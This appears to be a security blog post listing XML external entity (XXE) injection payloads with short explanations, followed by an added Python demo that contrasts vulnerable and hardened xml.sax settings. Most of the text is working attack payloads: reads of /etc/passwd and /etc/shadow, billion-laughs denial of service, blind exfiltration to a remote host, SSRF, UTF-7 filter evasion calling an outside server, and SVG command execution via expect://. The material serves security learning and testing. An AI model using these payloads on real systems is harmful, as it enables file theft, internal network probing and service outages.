List of XML external entity (XXE) injection payloads



  • This post explains what XML external entity (XXE) injection is and then lists payloads for the common variants: local file disclosure, entity-expansion denial of service, blind (out-of-band) exfiltration, SSRF, and the same attacks smuggled through other encodings and container formats (UTF-7, Base64, SOAP, SVG).

    What is XML external entity injection?
    XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It arises when an XML parser accepts a DOCTYPE supplied by the attacker and resolves the entities declared in it.

    It often allows an attacker to read files on the application server's file system and to interact with any back-end or external systems that the application itself can reach.

    There are various types of XXE attacks; the payloads below cover the main ones.

    XML external entity (XXE) injection payloads
    XXE: basic XML example (no DOCTYPE, no entities; shown for comparison)

    <?xml version="1.0"?>
    <userInfo>
     <firstName>John</firstName>
     <lastName>Doe</lastName>
    </userInfo>
    XXE: entity example (an internal entity; &example; is replaced by "Doe")
    <?xml version="1.0"?>
    <!DOCTYPE replace [<!ENTITY example "Doe">]>
    <userInfo>
     <firstName>John</firstName>
     <lastName>&example;</lastName>
    </userInfo>
    XXE: file expansion (an external entity whose SYSTEM identifier points at a local file; /etc/shadow is only readable as root, so /etc/passwd is the usual first probe when the parser runs unprivileged)
    <?xml version="1.0"?>
    <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow">]>
    <userInfo>
     <firstName>John</firstName>
     <lastName>&ent;</lastName>
    </userInfo>
    XXE: denial of service example ("billion laughs": each level references the previous one seven times, so &lol9; expands to 7^9 copies of "lol", roughly 120 MB from a payload of under 1 KB)
    <?xml version="1.0"?>
    <!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ELEMENT lolz (#PCDATA)>
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
    <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
    <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
    <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
    ]>
    <lolz>&lol9;</lolz>
    XXE: example of including a local file
    <?xml version="1.0"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY>
    <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
    <foo>&xxe;</foo>

    XXE: blind local file inclusion example (when the previous payload returns nothing in the response, the file is sent to an attacker-controlled host instead)

    <?xml version="1.0"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY>
    <!ENTITY % xxe SYSTEM "file:///etc/passwd">
    <!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]>
    <foo>&blind;</foo>
    Caveat: the XML specification forbids parameter-entity references inside markup declarations in the internal DTD subset, so a conforming parser such as libxml2 rejects this document as written. The usual working variant keeps only a parameter entity pointing at an attacker-hosted external DTD in the document and moves the declarations above into that DTD, where the restriction does not apply. The file must also be small and free of characters that break the URL (newlines, "#", "&"), or it has to be wrapped in an encoding filter first.
    XXE: access control bypass (loading restricted resources - PHP example; the php://filter wrapper base64-encodes the fetched content so that markup in it cannot break the parse, which also makes it the standard way to read PHP source)
    <?xml version="1.0"?>
    <!DOCTYPE foo [
    <!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
    <foo><result>&ac;</result></foo>
    XXE: SSRF example (server-side request forgery; the parser fetches the URL from the server's network position)
    <?xml version="1.0"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY>
    <!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]>
    <foo>&xxe;</foo>
    XXE: remote attack (via inclusion of an external XML document)
    <?xml version="1.0"?>
    <!DOCTYPE lolz [
    <!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
    <lolz><lol>3..2..1...&test;</lol></lolz>
    XXE: UTF-7 example (the same DOCTYPE and entity declaration encoded in UTF-7; it defeats filters that scan the raw bytes for "<!DOCTYPE" and only works if the parser honours the declared encoding)
    <?xml version="1.0" encoding="UTF-7"?>
    +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
    +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
    +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
    XXE: Base64-encoded entity (the data URI decodes to file:///etc/passwd, which the parser then loads as DTD content; data:// with two slashes is PHP's stream-wrapper spelling)
    <!DOCTYPE test [<!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk">%init;]><foo/>
    XXE: XXE inside SOAP (the CDATA section only becomes a payload if the application extracts the text and parses it a second time as XML)
    <soap:Body>
      <foo>
        <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/">%dtd;]><xxx/>]]>
      </foo>
    </soap:Body>
    XXE: XXE inside SVG (SVG is XML, so uploaded images reach the XML parser; this variant uses PHP's expect:// wrapper, which runs a command when the reference is resolved and requires the non-default expect extension)
    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
        <image xlink:href="expect://ls"></image>
    </svg>
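    As an added example (not part of the original post), the file-expansion payload above run through Python's standard-library xml.sax parser twice: once with external general entity resolution re-enabled (the vulnerable configuration, and the default before Python 3.7.1) and once with the hardened default. The secret file, its contents, and the LastNameCollector, build_file_payload, parse_last_name and naive_doctype_filter helpers are all constructed for this demo; the UTF-7 document is the payload listed above and is used to show why a byte-level scan for "<!DOCTYPE" is not a substitute for disabling entity resolution in the parser.

```python
# Added example, not code from the original post. Demonstrates the
# file-expansion XXE payload against Python's stdlib xml.sax parser in
# its vulnerable and hardened configuration. The secret file is created
# locally so the demo runs offline; no real system file is touched.
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class LastNameCollector(ContentHandler):
    """Collects the character data inside <lastName>, i.e. whatever the
    parser substituted for the &ent; reference (helper written for this demo)."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self.chunks = []

    def startElement(self, name, attrs):
        if name == "lastName":
            self._inside = True

    def endElement(self, name):
        if name == "lastName":
            self._inside = False

    def characters(self, content):
        if self._inside:
            self.chunks.append(content)


def build_file_payload(url):
    """The post's file-expansion payload with the SYSTEM identifier set to url."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE replace [<!ENTITY ent SYSTEM "%s">]>\n'
        "<userInfo><firstName>John</firstName>"
        "<lastName>&ent;</lastName></userInfo>\n" % url
    )


def parse_last_name(xml_text, resolve_external_entities):
    """Parse xml_text and return the text of <lastName>.

    resolve_external_entities=True turns external general entity fetching
    back on (the vulnerable setting). False is the hardened default since
    Python 3.7.1: the parser keeps the DOCTYPE but silently drops the
    external reference, so nothing is read from disk or the network.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = LastNameCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return "".join(handler.chunks)


def naive_doctype_filter(raw_bytes):
    """A byte-level 'reject any DOCTYPE' check. Returns True if it would block the input."""
    return b"<!DOCTYPE" in raw_bytes


# The UTF-7 payload listed above: the same DOCTYPE, invisible to naive_doctype_filter.
UTF7_PAYLOAD = (
    '<?xml version="1.0" encoding="UTF-7"?>\n'
    "+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4\n"
    "+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+\n"
    "+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4\n"
)


def demo():
    """Run the same payload against both configurations.

    Returns (text leaked by the vulnerable parser, text returned by the
    hardened parser, whether the byte-level filter catches the UTF-7 payload).
    """
    secret = "root:x:0:0:root:/root:/bin/bash\n"  # constructed stand-in for /etc/shadow
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(secret)
        secret_path = f.name
    try:
        payload = build_file_payload(pathlib.Path(secret_path).as_uri())
        leaked = parse_last_name(payload, resolve_external_entities=True)
        hardened = parse_last_name(payload, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, hardened, naive_doctype_filter(UTF7_PAYLOAD.encode("ascii"))


if __name__ == "__main__":
    leaked, hardened, caught = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(hardened))
    print("byte-level DOCTYPE filter catches the UTF-7 payload:", caught)
```

    Note that feature_external_ges only governs external general entities: the internal-entity example above ("Doe") still expands under the hardened setting, and the billion-laughs payload is not addressed by it at all (that relies on the amplification limits libexpat has enforced since 2.4.0). The reliable fix in any parser is to refuse the DOCTYPE altogether at the parser level rather than by inspecting bytes, since encoding tricks such as the UTF-7 payload hide the literal string.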
